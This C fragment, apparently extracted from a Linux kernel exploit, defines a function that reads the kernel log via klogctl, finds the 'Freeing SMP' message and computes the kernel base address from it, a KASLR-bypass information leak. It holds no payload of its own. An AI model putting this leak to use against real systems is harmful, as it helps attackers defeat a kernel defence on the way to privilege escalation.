
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int EXIT_FAILURE ;
 int MAP_ANONYMOUS ;
 int MAP_PRIVATE ;
 int PROT_READ ;
 int PROT_WRITE ;
 int SYSLOG_ACTION_READ_ALL ;
 int SYSLOG_ACTION_SIZE_BUFFER ;
 int exit (int ) ;
 int fprintf (int ,char*,char const*) ;
 int getpagesize () ;
 int klogctl (int ,char*,int) ;
 scalar_t__ memmem (char*,int,char const*,int ) ;
 scalar_t__ mmap (int *,int,int,int,int,int ) ;
 int perror (char*) ;
 int stderr ;
 int strlen (char const*) ;
 unsigned long strtoul (char*,char**,int) ;

unsigned long get_kernel_addr() {
 int size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
 if (size == -1) {
  perror("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)");
  exit(EXIT_FAILURE);
 }

 size = (size / getpagesize() + 1) * getpagesize();
 char *buffer = (char *)mmap(((void*)0), size, PROT_READ|PROT_WRITE,
  MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);

 size = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size);
 if (size == -1) {
  perror("[-] klogctl(SYSLOG_ACTION_READ_ALL)");
  exit(EXIT_FAILURE);
 }

 const char *needle1 = "Freeing SMP";
 char *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1));
 if (substr == ((void*)0)) {
  fprintf(stderr, "[-] substring '%s' not found in dmesg\n", needle1);
  exit(EXIT_FAILURE);
 }

 for (size = 0; substr[size] != '\n'; size++);

 const char *needle2 = "ffff";
 substr = (char *)memmem(&substr[0], size, needle2, strlen(needle2));
 if (substr == ((void*)0)) {
  fprintf(stderr, "[-] substring '%s' not found in dmesg\n", needle2);
  exit(EXIT_FAILURE);
 }

 char *endptr = &substr[16];
 unsigned long r = strtoul(&substr[0], &endptr, 16);

 r &= 0xfffffffffff00000ul;
 r -= 0x1000000ul;

 return r;
}
